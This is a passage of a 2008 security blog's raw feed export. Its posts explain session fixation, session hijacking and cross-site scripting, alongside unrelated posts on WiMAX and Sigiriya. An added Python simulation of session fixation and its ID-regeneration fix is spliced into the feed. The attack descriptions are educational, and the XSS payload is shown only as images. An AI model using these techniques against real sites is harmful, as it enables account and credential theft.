The name WiMAX was created by the WiMAX Forum, whi&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;ch was formed in June  2001 to promote conformance and interoperability of the standard.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:180%;" &gt;Unwired WiMax PC Card&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_o3V5vGrnHeM/R9dwf3chekI/AAAAAAAAAEg/mtXPHrXSpaA/s1600-h/WiMax_PC_Cards-Unwired_WiMax_PC_Card.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 205px; height: 125px;" src="http://bp1.blogger.com/_o3V5vGrnHeM/R9dwf3chekI/AAAAAAAAAEg/mtXPHrXSpaA/s320/WiMax_PC_Cards-Unwired_WiMax_PC_Card.jpg" alt="" id="BLOGGER_PHOTO_ID_5176729989447514690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(255, 0, 0);"&gt;What is WiMAX Forum?&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;An industry-led, non-profit corporation&lt;br /&gt;formed to promote and certify compatibility and&lt;br /&gt;interoperabili&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;ty of 802.16 broadband wireless products&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(255, 0, 0);"&gt;What is IEEE 802.16 ?&lt;/span&gt;&lt;br /&gt;An IEEE Standard for Wireless Metropolitan Area&lt;br /&gt;Networks&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/R9dyTHchemI/AAAAAAAAAEw/YB6l6YB9h7s/s1600-h/1.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_o3V5vGrnHeM/R9dyTHchemI/AAAAAAAAAEw/YB6l6YB9h7s/s200/1.bmp" alt="" id="BLOGGER_PHOTO_ID_5176731969427438178" 
border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Mortivation for 802.16&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;Cellular &amp;amp; WiFi Backhaul&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;Broadband on demand&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;Digital TV&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;&lt;br /&gt;Residential Broadband&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;&lt;br /&gt;&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;Under-served areas&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 204, 0);font-size:100%;" &gt;&lt;br /&gt;Portable and mobile coverage&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-7475678549919641713?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/7475678549919641713/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=7475678549919641713' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/7475678549919641713'/><link 
rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/7475678549919641713'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/03/wimax.html' title='WIMAX'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_o3V5vGrnHeM/R9dwAHchejI/AAAAAAAAAEY/jjhE9sULmS4/s72-c/wimax-logo.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-7111348517255260198</id><published>2008-03-01T01:28:00.001-08:00</published><updated>2008-03-01T01:29:37.153-08:00</updated><title type='text'>Attack process</title><content type='html'>&lt;span style="font-weight: bold;font-size:100%;" &gt;Generally, a session fixation attack is a three-step process, as shown in the following figure:&lt;br /&gt;&lt;br /&gt;1. Session setup:&lt;br /&gt;First, the attacker either sets up a so-called “trap session” on the target server and obtains that session’s ID, or selects a – usually arbitrary – session ID to be used in the attack. In some cases, the established trap session needs to be maintained (kept alive) by repeatedly sending requests referencing it to avoid idle session timeout.    
&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_o3V5vGrnHeM/R8kh2jP0ihI/AAAAAAAAAEQ/jZiabR65sng/s1600-h/1.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 313px; height: 170px;" src="http://bp1.blogger.com/_o3V5vGrnHeM/R8kh2jP0ihI/AAAAAAAAAEQ/jZiabR65sng/s200/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5172702868069976594" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;2. Session fixation:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;Next, the attacker needs to introduce her session ID into the user’s browser, thereby fixing his session.&lt;br /&gt;&lt;br /&gt;3. Session entrance:&lt;br /&gt;Finally, the attacker has to wait until the user logs in to the target server using the previously fixed session ID and then enter the user’s session.    
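Added example (not part of the original post): a small Python model of the three steps above, replayed against a server that adopts browser-supplied session IDs and against one that only honours IDs it issued and regenerates the ID at login. The names SessionStore, run_fixation_scenario, the "attacker-chosen-id" value and the user "alice" are invented for the illustration.

```python
import secrets


class SessionStore:
    """Minimal server-side session store used to model session fixation.

    accept_client_ids=True models the weak behaviour the post relies on: an ID the
    browser presents, even one the server never issued, is adopted as a session.
    regenerate_on_login=True is the standard mitigation: a fresh ID is issued at
    the privilege change, so an ID fixed before login never becomes authenticated.
    """

    def __init__(self, accept_client_ids, regenerate_on_login):
        self.accept_client_ids = accept_client_ids
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}            # session id -> {"user": name or None}
        self.unknown_id_events = []   # IDs presented that this server never issued

    def new_session(self):
        # secrets.token_urlsafe(32) gives 256 bits of entropy, enough that
        # prediction and brute force of a valid ID are not practical.
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def request(self, presented_id):
        """Resolve the session for one request; returns the ID the response carries."""
        if presented_id in self.sessions:
            return presented_id
        if presented_id is not None:
            # Detection signal: a cookie carrying an ID this server never issued.
            # Logging these is cheap and catches step 2 of the attack as it happens.
            self.unknown_id_events.append(presented_id)
            if self.accept_client_ids:
                # Weak behaviour: adopt the foreign ID as a real session.
                self.sessions[presented_id] = {"user": None}
                return presented_id
        return self.new_session()

    def login(self, presented_id, user):
        """Authenticate the user; returns the ID the browser holds afterwards."""
        sid = self.request(presented_id)
        if self.regenerate_on_login:
            # Mitigation: discard the pre-login ID and issue a new one.
            self.sessions.pop(sid, None)
            sid = self.new_session()
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, presented_id):
        """Return the user bound to an ID, or None if the ID is unknown or anonymous."""
        session = self.sessions.get(presented_id)
        return None if session is None else session["user"]


def run_fixation_scenario(accept_client_ids, regenerate_on_login):
    """Replay the post's three steps against a server with the given policy.

    Returns the user that the attacker's fixed ID resolves to after the victim
    logs in; None means the fixation failed.
    """
    server = SessionStore(accept_client_ids, regenerate_on_login)
    # Step 1, session setup: the attacker either picks an arbitrary ID (only useful
    # against a server that adopts foreign IDs) or obtains a real trap session.
    if accept_client_ids:
        trap_id = "attacker-chosen-id"   # constructed value
    else:
        trap_id = server.request(None)
    # Step 2, session fixation: the trap ID ends up in the victim's browser. The
    # delivery mechanism is outside this model; the browser simply presents it.
    victim_cookie = trap_id
    # Step 3, session entrance: the victim logs in, then the attacker presents the
    # trap ID and checks whose session it now is.
    server.login(victim_cookie, "alice")
    return server.whoami(trap_id)


if __name__ == "__main__":
    for accept, regen in [(True, False), (False, False), (False, True), (True, True)]:
        print(f"accept_client_ids={accept} regenerate_on_login={regen}: "
              f"trap ID resolves to {run_fixation_scenario(accept, regen)!r}")
```

Rejecting foreign IDs alone does not help, because the attacker can always obtain a genuine trap session (step 1); only regenerating the ID at login breaks the attack.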
&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-7111348517255260198?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/7111348517255260198/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=7111348517255260198' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/7111348517255260198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/7111348517255260198'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/03/attack-process.html' title='Attack process'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_o3V5vGrnHeM/R8kh2jP0ihI/AAAAAAAAAEQ/jZiabR65sng/s72-c/1.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-6846238686199044549</id><published>2008-03-01T01:24:00.000-08:00</published><updated>2008-03-01T01:26:56.768-08:00</updated><title type='text'>What is session Hijacking?</title><content type='html'>&lt;span style="font-weight: bold;font-size:100%;" &gt;Web-based applications frequently use sessions to provide a friendly environment to their users. 
HTTP is a stateless protocol, which means that it provides no integrated way for a web server to maintain state across a user’s subsequent requests. In order to overcome this problem, web servers – or sometimes web applications – implement various kinds of session management. The basic idea behind web session management is that the server generates a session identifier (ID) at some early point in user interaction, sends this ID to the user’s browser and makes sure that this same ID will be sent back by the browser along with each subsequent request. Session IDs thereby become identification tokens for users, and servers can use them to maintain session data (e.g., variables) and create a session-like experience for the users.&lt;br /&gt;&lt;br /&gt;There are three widely used methods for maintaining sessions in the web environment: URL arguments, hidden form fields and cookies. While each of them has its benefits and shortcomings, cookies have proven to be the most convenient and also the least insecure of the three. From a security perspective, most – if not all – known attacks against cookie-based session maintenance schemes can also be used against URL- or hidden-form-field-based schemes, while the converse is not true. This makes cookies the best choice security-wise.&lt;br /&gt;&lt;br /&gt;Very often, session IDs are not only identification tokens, but also authenticators. This means that upon login, users are authenticated based on their credentials (e.g., usernames/passwords or digital certificates) and issued session IDs that will effectively serve as temporary static passwords for accessing their sessions.&lt;br /&gt;&lt;br /&gt;This makes session IDs a very appealing target for attackers. In many cases, an attacker who manages to obtain a valid ID of a user’s session can use it to directly enter that session – often without arousing the user’s suspicion. 
Interestingly, most cross-site scripting proof-of-concept exploits focus on obtaining the session ID stored in the browser’s cookie storage. This class of attacks, where the attacker gains access to the user’s session by obtaining his session ID, is called session hijacking.&lt;br /&gt;&lt;br /&gt;Web session security is focused on preventing three types of attacks against session IDs: interception, prediction and brute-force attacks. Encrypted communication effectively protects against interception. Using cryptographically strong pseudorandom number generators and carefully chosen seeds that don’t leak from the server prevents prediction of session IDs. Finally, session IDs are immune to brute-force methods if their effective bit-length is large enough with respect to the number of simultaneous sessions.&lt;br /&gt;&lt;br /&gt;Proposals have been made for mitigating the threat of stolen session IDs, and some products already implement such ideas (e.g., RSA Security’s ACE/Agents for web servers).&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/6846238686199044549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=6846238686199044549' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/6846238686199044549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/6846238686199044549'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/03/what-is-session-hijacking.html' title='What is session 
Hijacking?'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-8915773830866192731</id><published>2008-02-18T01:18:00.000-08:00</published><updated>2008-02-18T02:09:07.342-08:00</updated><title type='text'>Sri Lankan Heritage</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;"SIGIRIYA"&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;8th wonder of the world&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/R7lZHcz2e8I/AAAAAAAAACY/DAVveK_5C1E/s1600-h/1+%283%29.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_o3V5vGrnHeM/R7lZHcz2e8I/AAAAAAAAACY/DAVveK_5C1E/s320/1+%283%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5168260031911984066" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: left; font-weight: bold;"&gt;You have all heard about Sigiriya and perhaps you have visited it. It is a small village 10 miles off Dambulla in the district of Matale. Visitors go there nearly every day to climb its huge Rock of ancient fame and see the beautiful paintings on a part of its walls as well as the interesting ruins found there. This Rock is very steep and is about 600 feet in height. 
It was once the fortress of a king of Ceylon who built a city around it and ruled from there for eighteen years. Here is the story of this king.&lt;br /&gt;&lt;br /&gt;About fifteen centuries ago King Datusena, the builder of Kalawewa tank, ruled at Anuradhapura. He had two sons, Kasyapa and Moggallana, and a daughter. Kasyapa was, however, not born of the queen. His mother was a woman of low birth, and Kasyapa therefore had no claim to the throne. &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/R7lRacz2exI/AAAAAAAAABA/-QW7BnK-POM/s1600-h/sigiriya2.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 190px; height: 130px;" src="http://bp2.blogger.com/_o3V5vGrnHeM/R7lRacz2exI/AAAAAAAAABA/-QW7BnK-POM/s320/sigiriya2.jpg" alt="" id="BLOGGER_PHOTO_ID_5168251562236476178" border="0" /&gt;&lt;/a&gt;Moggallana, on the other hand, was born of the royal queen and was the rightful heir. The king's daughter married the 'Senapathi' (the Commander-in-Chief of the King's army), but her mother-in-law was a cruel woman and she ill-treated her. When the king heard of this he flew into such a violent rage that he burnt the mother-in-law alive! Angered by this wicked deed, the Senapathi now looked out for a way of revenging himself on the king. Knowing that Kasyapa was displeased with his father, because his low birth prevented him from becoming king after him, the Senapathi urged him to rebel against the king. Kasyapa readily agreed. He captured his father with the Senapathi's support, and is said to have stood him up against a wall and buried him alive by plastering him over with clay! 
&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_o3V5vGrnHeM/R7lQ28z2ewI/AAAAAAAAAA4/aWU4w4L1YVE/s1600-h/sigiriya-lion+copy.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 195px; height: 129px;" src="http://bp0.blogger.com/_o3V5vGrnHeM/R7lQ28z2ewI/AAAAAAAAAA4/aWU4w4L1YVE/s320/sigiriya-lion+copy.jpg" alt="" id="BLOGGER_PHOTO_ID_5168250952351120130" border="0" /&gt;&lt;/a&gt;He tried to seize his brother, Moggallana, too and do away with him because he feared that some day Moggallana would make a bid for the throne. But Moggallana was too quick for him. He escaped to India.&lt;br /&gt;&lt;br /&gt;Kasyapa now placed himself on the throne and ruled at Anuradhapura. His subjects, however, were displeased with him over the foul murder of his father, and he lived in constant fear of a rebellion. He also feared that his brother, with an army from India, would invade Ceylon at any moment. So he moved his capital to Sigiriya where, on the top of the Rock, he built himself a large and beautiful palace. He built a wonderful staircase leading to it through the mouth of a huge lion carved out of stone. He named the Rock "Sinha-giri" or "Sigiri", which means "Lion Rock". Round this he built a moat to protect himself against enemies.&lt;br /&gt;On a side of the royal palace he had a large pond made. Several watch-towers, built on the summit of the Rock, overlooked the surrounding country.&lt;br /&gt;&lt;br /&gt;Kasyapa reigned from this Rock fortress for eighteen years until Moggallana came with a powerful army to wage war on him. 
Instead of waiting for him in his fortress he came down the Rock and bravely rode forth to meet his brother. On the way he came across a muddy place and he turned his elephant back to go along another way. His men, however, thought that he was turning aside to avoid a battle, and so they fled, leaving him all alone. Feeling ashamed to fall into the hands of his brother, Kasyapa killed himself by cutting his throat with his own sword.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;Sigiriya is the World's most beautiful place ... Give your comments according to these shots..&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_o3V5vGrnHeM/R7lYWMz2e6I/AAAAAAAAACI/ke27AIvOVVI/s1600-h/1+%284%29.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp1.blogger.com/_o3V5vGrnHeM/R7lYWMz2e6I/AAAAAAAAACI/ke27AIvOVVI/s320/1+%284%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5168259185803426722" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/R7lYWcz2e7I/AAAAAAAAACQ/ZCqzGl4IjUU/s1600-h/1+%285%29.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp2.blogger.com/_o3V5vGrnHeM/R7lYWcz2e7I/AAAAAAAAACQ/ZCqzGl4IjUU/s320/1+%285%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5168259190098394034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_o3V5vGrnHeM/R7lV0Mz2eyI/AAAAAAAAABI/epEVPTg9QBc/s1600-h/1.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp1.blogger.com/_o3V5vGrnHeM/R7lV0Mz2eyI/AAAAAAAAABI/epEVPTg9QBc/s320/1.jpg" alt="" id="BLOGGER_PHOTO_ID_5168256402664618786" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_o3V5vGrnHeM/R7lWqsz2e1I/AAAAAAAAABg/dAZjNbno_u8/s1600-h/1+%281%29.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_o3V5vGrnHeM/R7lWqsz2e1I/AAAAAAAAABg/dAZjNbno_u8/s320/1+%281%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5168257338967489362" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_o3V5vGrnHeM/R7lV0sz2ezI/AAAAAAAAABQ/CqowWwPO4LE/s1600-h/1+%282%29.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_o3V5vGrnHeM/R7lV0sz2ezI/AAAAAAAAABQ/CqowWwPO4LE/s320/1+%282%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5168256411254553394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 
src='https://blogger.googleusercontent.com/tracker/8434463709749247651-8915773830866192731?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/8915773830866192731/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=8915773830866192731' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/8915773830866192731'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/8915773830866192731'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/02/sri-lankan-heritage.html' title='Sri Lankan Heritage'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_o3V5vGrnHeM/R7lZHcz2e8I/AAAAAAAAACY/DAVveK_5C1E/s72-c/1+%283%29.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-8296626604115888320</id><published>2008-02-15T23:31:00.001-08:00</published><updated>2008-02-15T23:55:53.716-08:00</updated><title type='text'>How work CSS</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;Have you ever mistyped the address of a web site and received a message like “Error - page name could not be found” or “The page you requested: page name does not exist”? Certainly you have, and odds are you never gave it a second thought; you simply corrected the address or went to a different site altogether. 
It happens all the time. There are plenty of dead links, or links with typos to stumble upon. However, when you encounter an error message like the two listed above, you are actually witnessing a potential s&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;ecurity breach—not necessarily against the site, but rather against you directly.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Suppose you entered the following&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt; valid URL:&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_o3V5vGrnHeM/R7aUOcz2etI/AAAAAAAAAAg/8kO_bAhbvyg/s1600-h/1.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 659px; height: 133px;" src="http://bp3.blogger.com/_o3V5vGrnHeM/R7aUOcz2etI/AAAAAAAAAAg/8kO_bAhbvyg/s320/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5167480598426974930" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;Notice that "FILENAME.htm&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;l" is a string that you entered. The web site has included it in the page returned straight through to your browser.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;This may seem harmless, but now imagine that you are browsing through auctions on a popular site; let’s call it auctions.example.com. You come across several auctions that someone has posted and would like to see more items that the same person has for sale; let’s assume this person is a “bad guy” (though you don’t know it) and call him BG12345. 
You&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt; click on BG12345’s website and see a listing of his auctions. You click on a link on his page that interests you and are taken to auction.example.com’s site displaying that item. You scroll down to place a bid, and the auction site prompts you for your name and password to sign in. You enter all the information and hit the submit button. Everything looks fine, but in reality, the information that you submit is getting sent back to BG12345. How can this be? The answer is that auction.example.com has what is known as a cross-site scripting (CSS) vulnerability.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;A CSS vulnerability is caused by the failure of a site to validate user input before returning it to the client’s web-browser. The essence of cross-site scripting is that an intruder causes a legitimate web server to send a page to a victim's browser that contains malicious script or HTML of the intruder's choosing. The malicious script runs with the privileges of a legitimate script originating from the legitimate web server. The two error messages mentioned earlier could be examples of such a situation. If instead of entering a page name, you entered an HTML or script tag, the server would have returned that command to your browser, as well. Your browser would assume the HTML or script tag was from auction.example.com. It would run the script with the privileges that are set up for that site, and when you looke&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;d at the website, everything would appear to be normal.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;BG12345 used the same method to deceive you. When you clicked on the link to BG12345’s auction, the link was actually to an invalid page. 
The link may have looked something like the example below; it used HTML and scripting to mimic the auction site’s page exactly. However, when you clicked submit, it used a form that passed your information back to BG12345. Now BG12345 can access your account, place bids, and change your information. BG12345 can also change your password and lock you out of your own account. Even worse, BG12345 can see the credit card number that you registered with.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;So what did BG12345 do? BG12345’s web site offered a link to auction.example.com that looked something like this:&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_o3V5vGrnHeM/R7aUdcz2euI/AAAAAAAAAAo/6Vy6Xyc95VQ/s1600-h/2.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 653px; height: 156px;" src="http://bp3.blogger.com/_o3V5vGrnHeM/R7aUdcz2euI/AAAAAAAAAAo/6Vy6Xyc95VQ/s320/2.JPG" alt="" id="BLOGGER_PHOTO_ID_5167480856125012706" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;In effect, BG12345 managed to "inject" a JavaScript program into the page returned to you by auction.example.com. The JavaScript ran as though it originated at auction.example.com, and could therefore process events in that document. It also maintained communication with BG12345 by virtue of scripting that BG12345 put in the link; this is the way a CSS vulnerability can be exploited to "sniff" sensitive data from within a web page, including passwords, credit card numbers, and any other arbitrary information you input. There are a number of variants to this problem. Odds are that bank.example.com also has the same vulnerability somewhere on its site. 
BG12345 could potentially access your bank account and transfer funds using the same process.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/8296626604115888320/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=8296626604115888320' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/8296626604115888320'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/8296626604115888320'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/02/how-work-css.html' title='How work CSS'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_o3V5vGrnHeM/R7aUOcz2etI/AAAAAAAAAAg/8kO_bAhbvyg/s72-c/1.JPG' height='72' 
